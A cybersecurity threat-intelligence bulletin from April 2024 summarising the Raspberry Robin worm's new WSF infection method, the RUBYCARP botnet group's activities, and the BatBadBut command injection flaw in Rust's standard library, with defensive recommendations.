Ankura CTIX FLASH Update – April 12, 2024 – Security

Ransomware/Malware Activity

Raspberry Robin Worm Now Spreads Through Windows Script
Files (WSF)

Raspberry Robin is a Windows worm first introduced in 2021 and
is known for establishing a malicious foothold in victim devices in
order to deliver some of the most prevalent forms of malware
including SocGholish, Cobalt Strike, and IcedID. Raspberry Robin
has been known to initially infect victim computers through
compromised USB devices, RAR files hosted on Discord, and ZIP files
contained in malicious advertisements and downloaded via the web
browser. Researchers have now identified a new infection method via
Windows Script Files (.wsf) which are hosted on malicious domains
and subdomains controlled by threat actors. The WSF file performs
as a downloader and retrieves the main DLL payload from a
compromised remote server using the curl command. Raspberry Robin
is noted for its sophisticated obfuscation and anti-analysis
techniques deployed to evade detection and hinder discovery. The
Raspberry Robin script runs a series of checks on the victim
environment and aborts execution should a check fail. The checks
include whether the script is being run in a virtualized
environment, the windows operating system, and whether certain
anti-virus programs are running. Importantly, the Raspberry Robin
scripts are not currently classified as malicious by anti-virus
scanners on Virus Total, which is reflective of the evasiveness of
the malware. Identifying this malware early in the infection chain
should be a high priority for security teams as it is a precursor
to more malicious malware such as infostealers and ransomware. CTIX
analysts recommend blocking the indicators of compromise (IOCs)
associated with this campaign. CTIX analysts will continue to
report on new and evolving malware campaigns.

Threat Actor Activity

Stealthy RUBYCARP Botnet Group Discovered After a Decade
of Operation

A suspected Romanian botnet group known as RUBYCARP has been
discovered after more than ten (10) years of activity operating
their botnet. They are known to be financially motivated with
similarities among their tactics that possibly link them to the
Outlaw APT threat group. RUBYCARP specializes in exploiting known
vulnerabilities and using brute force attacks to compromise
corporate networks and servers. The cybercriminal’s arsenal has
been diverse, exploiting vulnerabilities in Laravel applications
(CVE-2021-3129), brute-forcing SSH servers, and targeting WordPress
sites via credential dumps. The botnet, comprised of over 600
compromised servers, primarily utilizes Perl-based payloads with a
significant focus on crypto mining, phishing campaigns, and
distributed denial of service (DDoS) attacks. The attackers
frequently rotate their infrastructure and have been observed
kicking out clients whose connections are not properly configured,
additionally blocking the IPs to avoid security analysts attempting
to investigate the group’s infrastructure. Of the thirty-nine
(39) discovered variants, only eight (8) appeared on VirusTotal,
highlighting the groups sophisticated evasion tactics. Along with
launching DDoS attacks from infected devices, RUBYCARP uses an
array of crypto miners to mine cryptocurrencies like Monero,
Ethereum, and Ravencoin at the expense of the victim’s
computational resources. Additionally, phishing tactics are used to
steal financial information such as credit card data, either by
deploying phishing messages directly on compromised servers or
sending phishing emails from them. The phishing campaigns have
largely been aimed at European targets, including Swiss Bank, Nets
Bank, and Bring Logistics. While RUBYCARP isn’t the largest
player in the arena of botnets, their stealthiness and operational
security is impressive. The group’s activities highlight the
persistent threat posed by organized cybercrime groups and the
importance of robust cybersecurity measures to protect against such
threats.

Vulnerabilities

Critical “BatBadBut” Vulnerability in the Rust
Standard Library Allows for Windows Command Injection
Attacks

A critical security vulnerability in the Rust standard library
dubbed “BatBadBut” has been discovered, primarily
affecting Windows systems through command injection attacks. This
flaw, tracked as CVE-2024-24576, which was given a CVSS score of
10/10 by GitHub, allows unauthenticated attackers to remotely
execute malicious commands on a system without any user
interaction, due to weaknesses in how OS commands and arguments are
handled. Specifically, the vulnerability occurs when batch files
with “.bat” or “.cmd” extensions are invoked
through the Command API without proper argument escaping. This
issue is confined to Rust versions prior to 1.77.2 on Windows, and
no other platforms are impacted. The Rust Security Response working
group has addressed the issue by modifying the Command API to
improve argument escaping and handle errors more robustly. This
vulnerability also affects several other programming languages like
Java, Go, and Python, though not all have issued patches. Security
recommendations include moving batch files out of accessible
directories to prevent unauthorized execution. CTIX analysts urge
all developers to identify which of their programming languages are
affected and download the latest patch or follow the guidance
documentation provided by the maintainers.

The content of this article is intended to provide a general
guide to the subject matter. Specialist advice should be sought
about your specific circumstances.